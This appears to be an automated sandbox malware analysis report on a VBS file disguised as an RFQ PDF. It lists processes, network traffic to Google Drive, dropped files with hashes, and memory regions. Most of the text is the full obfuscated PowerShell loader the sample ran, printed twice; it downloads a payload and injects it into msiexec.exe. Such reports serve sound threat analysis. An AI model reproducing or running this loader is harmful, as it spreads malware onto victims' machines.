| PID 4948 wrote to memory of 4364 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4948 wrote to memory of 4364 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_64182MR_PDF.R00.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios .tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios .tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4364 -ip 4364
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4364 -s 1896
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.178.3:80 | o.pki.goog | tcp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 104.116.69.13.in-addr.arpa | udp |
Files
memory/2516-0-0x00007FFEEAAA3000-0x00007FFEEAAA5000-memory.dmp
memory/2516-1-0x000001F898C90000-0x000001F898CB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cbancuv1.ibb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2516-11-0x00007FFEEAAA0000-0x00007FFEEB561000-memory.dmp
memory/2516-12-0x00007FFEEAAA0000-0x00007FFEEB561000-memory.dmp
memory/2516-15-0x00007FFEEAAA3000-0x00007FFEEAAA5000-memory.dmp
memory/2516-16-0x00007FFEEAAA0000-0x00007FFEEB561000-memory.dmp
memory/2516-17-0x00007FFEEAAA0000-0x00007FFEEB561000-memory.dmp
memory/2516-20-0x00007FFEEAAA0000-0x00007FFEEB561000-memory.dmp
memory/4948-21-0x00000000022B0000-0x00000000022E6000-memory.dmp
memory/4948-22-0x0000000004EC0000-0x00000000054E8000-memory.dmp
memory/4948-23-0x0000000004D10000-0x0000000004D32000-memory.dmp
memory/4948-25-0x00000000054F0000-0x0000000005556000-memory.dmp
memory/4948-24-0x0000000004DB0000-0x0000000004E16000-memory.dmp
memory/4948-35-0x00000000055A0000-0x00000000058F4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 806286a9ea8981d782ba5872780e6a4c |
| SHA1 | 99fe6f0c1098145a7b60fda68af7e10880f145da |
| SHA256 | cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713 |
| SHA512 | 362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e |
memory/4948-37-0x0000000005BE0000-0x0000000005BFE000-memory.dmp
memory/4948-38-0x0000000005C30000-0x0000000005C7C000-memory.dmp
memory/4948-40-0x0000000006D40000-0x0000000006D5A000-memory.dmp
memory/4948-39-0x0000000007380000-0x00000000079FA000-memory.dmp
memory/4948-42-0x0000000006DF0000-0x0000000006E12000-memory.dmp
memory/4948-41-0x0000000006E50000-0x0000000006EE6000-memory.dmp
C:\Users\Admin\AppData\Roaming\Platyhelminthic195.End
| MD5 | 6771cd798c1df9b5eddc60071dfc6e15 |
| SHA1 | 65e923600e1c2604d90a481d257dc99c23fbf1dd |
| SHA256 | 0849655061e0ce5f5f2633e43ef08a62a3482cf9f15baf24fbd6b25f8abad95f |
| SHA512 | cf0013a56ef6ab5fb48ddd80d3e94b879b6890586a5e11313c66b35c352111d3fff2d21a9f9e42a4163cf4e05419610a696e5d428a32eacb45d6f4103b9085ee |
memory/4948-43-0x0000000007FB0000-0x0000000008554000-memory.dmp
memory/4948-45-0x0000000008560000-0x000000000D4E8000-memory.dmp
memory/4364-58-0x0000000001000000-0x0000000002254000-memory.dmp
memory/4364-59-0x0000000001000000-0x0000000002254000-memory.dmp